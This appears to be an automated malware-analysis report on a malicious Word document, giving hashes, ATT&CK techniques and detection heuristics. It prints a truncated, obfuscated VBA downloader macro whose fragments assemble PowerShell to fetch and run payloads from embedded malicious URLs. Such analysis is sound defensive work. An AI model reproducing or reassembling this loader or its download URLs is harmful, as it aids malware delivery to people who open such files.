Office (OLE) malware analysis — malicious · 8d6eec4b3fadee65

MALICIOUS

Office (OLE)

192.5 KB Created: 2017-12-08 11:09:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 928faf741c82ab1757e13b73813b82f6 SHA-1: 54473227821926119abada2273c8cbbbf8f84408 SHA-256: 8d6eec4b3fadee65ba0cc21c6ef29e9bac83f0c132e53cc8310a0819e0f345fb

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function to execute a downloaded payload from a constructed URL. The reconstructed URL is "http://tsimtsuizZ+izZm.eu/JhmSbcRRp8GBP". This indicates a downloader or droppper functionality, likely delivered via spearphishing.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://izZ+izZyizZ+izZaylainveizZ0lI+0lI+izZsizZ+izZtizZ+izZmenizZ0lI+0lI+izZt In document text (OLE body)
- http://decizZ+izZoraizZ+izZtivesi0lI+0lIzZ+izZtylizZ+izZeinizZ+izZciRTnIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75826 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	75826 bytes
SHA-256: `2fa05c2a55060a46dddc171752297d3dd64d7aece164d81dedce306337377883`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "GUwZGrQNo" Function dvuptJDpTi() qSDwYlOjC = UCase("VVJbszTBfzbqQO" + "CkiqwEaTjXAj" + "nPOkfsQnAXHF" + "pKauLWw" + "YzrDjtvBZErO") + UCase("NQiqLXzwBMWk" + "PQspMdkzORWjzz" + "laTPrUbtrD" + "wBnXlVSmiiIjsO" + "mzwMKLYbMbt") RAMsFnoo = Mid("hjsh9zi9LrqwoWEFv'+'.coi0l'+'I+0lIzZ+izZm/'+'Fi'+'zZ+izZ68qi0lI+0'+'lIzZ+izZOizZ+izZaq/,izZ+izZhttpizZ+izZ://tsimtsuizZ+izZm.eu/JhmSbcRRp8GBP", 18, 111) bWqSSACQsJ = UCase("oiYCJiUtXKuc" + "DwRrSXMq" + "OkkJqTAkzfb" + "JWBOkSLjZUYA" + "wwFTGaCtNQn") + UCase("AnBsmMOAf" + "ZPdhFBGBtMkit" + "uRrFYnvGOz" + "iKqmIJzzDXqq" + "VBmMXbhWui") likVCOU = UCase("tZnWAmM" + "iKrjAONVrcq" + "BNicuftnaaa" + "sPYMqHIzjivcHS" + "vwDkkkSE") + UCase("rLbUsYEIjvo" + "pAijUtuTRFUc" + "zpXqpLZLsV" + "fnEHdmsMdZG" + "YBQrXlOlqzAvjh") DRHBXricu = UCase("iEqNaijTkT" + "wpwMPBuubVC" + "OVjKEFA" + "HcSqIkbwo" + "GZilOhXwWc") + UCase("AvDfBcs" + "XbNjFYUXHEfZzG" + "OdVcGzn" + "jYKHjPKH" + "jCQusqdN") hvAsscAFYS = Mid("EdktDB0lI+0lIA/,http://izZ+izZyizZ+izZaylainveizZ0lI+0lI+izZsizZ+izZtizZ+izZmenizZ0lI+0lI+izZt'+'s.izZ+izZco'+'m/dAGsizZ+izZb/,hizZ+izZttp://peteizZ+izZrhalliizZ+i0lI+0lIz0lIRivJF8bO", 6, 169) SEsIVBr = UCase("tkOawizDj" + "mpiNIwuqqwpZU" + "ZdkojmJ" + "wUwcPzJTYz" + "CkvjXiAGEsid") + UCase("PMASuLWufO" + "KOjjvjXarqRRi" + "MGjjEjNriMDwrY" + "bpXWCZJCR" + "XVImdwvW") izVjqc = UCase("KPrqCFuqoBfzlu" + "TiKuQnIzwWqv" + "KWnsPMoYQsVEN" + "aIbJwHjaNfiwH" + "SvUMKEf") + UCase("OnjYFLDmp" + "DwhoUNsoJjJIK" + "FnGVXJuIK" + "uoZZBUXa" + "rtKUdaHTWuwIG") skFUVCWmjm = UCase("kmDCiYtwFVO" + "VpVLozJUzOcH" + "JdQZUKz" + "FAOJQqsIbYD" + "GKprqqsHjdV") + UCase("wBZvcWkK" + "DPoGCYHRL" + "pZjtwnYjdS" + "tcfENOQwfFosK" + "vBloSlp") zlOPsGQ = Mid("hZ(2vBabc in 2vBizZ+izZbcd){try{2izZ+k6DjfEMXb", 2, 36) WEZRzVkbjf = UCase("RTSFiPjvulY" + "jnTmpMiSSZuScu" + "pYNOAoLIF" + "OpLKwwYvjtUA" + "FkZnLsZAdnzq") + UCase("hXXFVfNDaX" + "IVbVXsBwoo" + "dbAAQjil" + "MTYRBXi" + "pnffNBfpRD") tvziEV = UCase("FfkPHaIDnG" + "XJmJBpJqVjSBj" + "qDmnuLhCWW" + "TzHpnbRhAmtIrj" + "JuTqniEsRXWQsv") + UCase("UnQJhrCB" + "FATfjwvuEvBn" + "fjVPFpSRLZmq" + "GriBIHsll" + "KYIUbcLztWlH") QBusVjvRrcq = UCase("UAMjwVlG" + "rsBDoYDZvA" + "ZZUmwCpntdwk" + "fJwbJCVY" + "aFchzmf") + UCase("IziJhvjakufzMw" + "IoXiacPtiKVwOK" + "EDIuVwGDw" + "RAYHqariK" + "saHEWsEzwM") FIaSLMNatd = Mid("UsMD 0lI95P'+'0lI,[ch'+'Ar]36)) ')-rEPLACE'yD7',[ChAR]36 -rEPLACE ([ChAR]48+[ChAR]108+[ChAR]73),[ChAR]39) \|.( $pshOmE[4]+$pSHOmE[34]+'x')BiSp1Zvi29", 5, 135) SzuTmCAMF = UCase("oSlMjQubjpSq" + "LDnuuzu" + "KqwUqozbtTjwKu" + "WuJUrLdjqiXQ" + "JwcnNldb") + UCase("rtcuznVlrtRUQ" + "ldCljGGqSXrSur" + "kZQHhDQswLpOE" + "iznswrJKAwUi" + "aEChtis") AKQhf = UCase("RPTpcpSbvClYQI" + "qlnjdUDqYiv" + "XcuGFmR" + "lFSNlZCPRHBqvv" + "SLOibNY") + UCase("KjluzAvjmzJqlT" + "wDRoZRdFHca" + "uqDplMKHhzi" + "OVbPqmE" + "wlPfKYzdh") jAkIS = UCase("rwvBBju" + "wSqHfJhzo" + "pLUZVBCISO" + "SWpzSjEK" + "uTKYwuWF") + UCase("dzFJVOQ" + "RatwsOjJdwAH" + "dcohiWBvd" + "fwDpQBIAbih" + "iQIBFdPSw") vJEdQPDab = Mid("cMwXzbbWDszZmKzF-JOi'+'NizZizZ) ( ((izZ2vBfran'+'c'+'izZ+'+'izZ = neizZ+izZw-oizZ+iz0lI+0lIZbject SystemizZ+i0lI+0lIzZ.NetizZ+izZ.We0lI+NbsQ", 17, 120) mtLUJA = UCase("iSYYBpiKXia" + "twZOaDpN" + "UXJdIaYfN" + "jZFVLfpU" + "jjPapmsRFwww") + UCase("UMJvOvsOJfKRt" + "ncNiljDjiEzU" + "QJSjOQsFsMQQu" + "XXBFIvAEpsN" + "NkniEwuEc") AzGholsnXG = UCase("wrzVQcqsPp" + "zOBoZQHVvZZfO" + "YYcRXjLcJwMpul" + "JiTsbfBGNfM" + "zDvZLkYs") + UCase("ObrJcWE" + "bjVVplq" + "nnSWSPl" + "XOZOZBEW" + "bvHbjzIzDlvrm") QjXTPiztqQ = UCase("HwdhzbkYv" + "tFoZNiEO" + "AIYftmG" + "SXpukLuqXzm" + "pwZiJjwYTva") + UCase("WDFFiRkus" + "SBGQIuujqhSkKC" + "pVNpiMWzXYhG" + "HFMrlsfXctXCi" + "FszlsCWswXEK") HGkVatCw = Mid("u1VISkI2tmPizZ+iz'+'Zt(1,izZ+izZ izZ+izZ343izZ+izZ245);0lI+0lIizZ+izZ2vBi ... (truncated)

SHA-256: 2fa05c2a55060a46dddc171752297d3dd64d7aece164d81dedce306337377883

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GUwZGrQNo"
Function dvuptJDpTi()
qSDwYlOjC = UCase("VVJbszTBfzbqQO" + "CkiqwEaTjXAj" + "nPOkfsQnAXHF" + "pKauLWw" + "YzrDjtvBZErO") + UCase("NQiqLXzwBMWk" + "PQspMdkzORWjzz" + "laTPrUbtrD" + "wBnXlVSmiiIjsO" + "mzwMKLYbMbt")
RAMsFnoo = Mid("hjsh9zi9LrqwoWEFv'+'.coi0l'+'I+0lIzZ+izZm/'+'Fi'+'zZ+izZ68qi0lI+0'+'lIzZ+izZOizZ+izZaq/,izZ+izZhttpizZ+izZ://tsimtsuizZ+izZm.eu/JhmSbcRRp8GBP", 18, 111)
bWqSSACQsJ = UCase("oiYCJiUtXKuc" + "DwRrSXMq" + "OkkJqTAkzfb" + "JWBOkSLjZUYA" + "wwFTGaCtNQn") + UCase("AnBsmMOAf" + "ZPdhFBGBtMkit" + "uRrFYnvGOz" + "iKqmIJzzDXqq" + "VBmMXbhWui")
likVCOU = UCase("tZnWAmM" + "iKrjAONVrcq" + "BNicuftnaaa" + "sPYMqHIzjivcHS" + "vwDkkkSE") + UCase("rLbUsYEIjvo" + "pAijUtuTRFUc" + "zpXqpLZLsV" + "fnEHdmsMdZG" + "YBQrXlOlqzAvjh")
DRHBXricu = UCase("iEqNaijTkT" + "wpwMPBuubVC" + "OVjKEFA" + "HcSqIkbwo" + "GZilOhXwWc") + UCase("AvDfBcs" + "XbNjFYUXHEfZzG" + "OdVcGzn" + "jYKHjPKH" + "jCQusqdN")
hvAsscAFYS = Mid("EdktDB0lI+0lIA/,http://izZ+izZyizZ+izZaylainveizZ0lI+0lI+izZsizZ+izZtizZ+izZmenizZ0lI+0lI+izZt'+'s.izZ+izZco'+'m/dAGsizZ+izZb/,hizZ+izZttp://peteizZ+izZrhalliizZ+i0lI+0lIz0lIRivJF8bO", 6, 169)
SEsIVBr = UCase("tkOawizDj" + "mpiNIwuqqwpZU" + "ZdkojmJ" + "wUwcPzJTYz" + "CkvjXiAGEsid") + UCase("PMASuLWufO" + "KOjjvjXarqRRi" + "MGjjEjNriMDwrY" + "bpXWCZJCR" + "XVImdwvW")
izVjqc = UCase("KPrqCFuqoBfzlu" + "TiKuQnIzwWqv" + "KWnsPMoYQsVEN" + "aIbJwHjaNfiwH" + "SvUMKEf") + UCase("OnjYFLDmp" + "DwhoUNsoJjJIK" + "FnGVXJuIK" + "uoZZBUXa" + "rtKUdaHTWuwIG")
skFUVCWmjm = UCase("kmDCiYtwFVO" + "VpVLozJUzOcH" + "JdQZUKz" + "FAOJQqsIbYD" + "GKprqqsHjdV") + UCase("wBZvcWkK" + "DPoGCYHRL" + "pZjtwnYjdS" + "tcfENOQwfFosK" + "vBloSlp")
zlOPsGQ = Mid("hZ(2vBabc in 2vBizZ+izZbcd){try{2izZ+k6DjfEMXb", 2, 36)
WEZRzVkbjf = UCase("RTSFiPjvulY" + "jnTmpMiSSZuScu" + "pYNOAoLIF" + "OpLKwwYvjtUA" + "FkZnLsZAdnzq") + UCase("hXXFVfNDaX" + "IVbVXsBwoo" + "dbAAQjil" + "MTYRBXi" + "pnffNBfpRD")
tvziEV = UCase("FfkPHaIDnG" + "XJmJBpJqVjSBj" + "qDmnuLhCWW" + "TzHpnbRhAmtIrj" + "JuTqniEsRXWQsv") + UCase("UnQJhrCB" + "FATfjwvuEvBn" + "fjVPFpSRLZmq" + "GriBIHsll" + "KYIUbcLztWlH")
QBusVjvRrcq = UCase("UAMjwVlG" + "rsBDoYDZvA" + "ZZUmwCpntdwk" + "fJwbJCVY" + "aFchzmf") + UCase("IziJhvjakufzMw" + "IoXiacPtiKVwOK" + "EDIuVwGDw" + "RAYHqariK" + "saHEWsEzwM")
FIaSLMNatd = Mid("UsMD 0lI95P'+'0lI,[ch'+'Ar]36)) ')-rEPLACE'yD7',[ChAR]36  -rEPLACE  ([ChAR]48+[ChAR]108+[ChAR]73),[ChAR]39) |.( $pshOmE[4]+$pSHOmE[34]+'x')BiSp1Zvi29", 5, 135)
SzuTmCAMF = UCase("oSlMjQubjpSq" + "LDnuuzu" + "KqwUqozbtTjwKu" + "WuJUrLdjqiXQ" + "JwcnNldb") + UCase("rtcuznVlrtRUQ" + "ldCljGGqSXrSur" + "kZQHhDQswLpOE" + "iznswrJKAwUi" + "aEChtis")
AKQhf = UCase("RPTpcpSbvClYQI" + "qlnjdUDqYiv" + "XcuGFmR" + "lFSNlZCPRHBqvv" + "SLOibNY") + UCase("KjluzAvjmzJqlT" + "wDRoZRdFHca" + "uqDplMKHhzi" + "OVbPqmE" + "wlPfKYzdh")
jAkIS = UCase("rwvBBju" + "wSqHfJhzo" + "pLUZVBCISO" + "SWpzSjEK" + "uTKYwuWF") + UCase("dzFJVOQ" + "RatwsOjJdwAH" + "dcohiWBvd" + "fwDpQBIAbih" + "iQIBFdPSw")
vJEdQPDab = Mid("cMwXzbbWDszZmKzF-JOi'+'NizZizZ) ( ((izZ2vBfran'+'c'+'izZ+'+'izZ = neizZ+izZw-oizZ+iz0lI+0lIZbject SystemizZ+i0lI+0lIzZ.NetizZ+izZ.We0lI+NbsQ", 17, 120)
mtLUJA = UCase("iSYYBpiKXia" + "twZOaDpN" + "UXJdIaYfN" + "jZFVLfpU" + "jjPapmsRFwww") + UCase("UMJvOvsOJfKRt" + "ncNiljDjiEzU" + "QJSjOQsFsMQQu" + "XXBFIvAEpsN" + "NkniEwuEc")
AzGholsnXG = UCase("wrzVQcqsPp" + "zOBoZQHVvZZfO" + "YYcRXjLcJwMpul" + "JiTsbfBGNfM" + "zDvZLkYs") + UCase("ObrJcWE" + "bjVVplq" + "nnSWSPl" + "XOZOZBEW" + "bvHbjzIzDlvrm")
QjXTPiztqQ = UCase("HwdhzbkYv" + "tFoZNiEO" + "AIYftmG" + "SXpukLuqXzm" + "pwZiJjwYTva") + UCase("WDFFiRkus" + "SBGQIuujqhSkKC" + "pVNpiMWzXYhG" + "HFMrlsfXctXCi" + "FszlsCWswXEK")
HGkVatCw = Mid("u1VISkI2tmPizZ+iz'+'Zt(1,izZ+izZ izZ+izZ343izZ+izZ245);0lI+0lIizZ+izZ2vBi
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.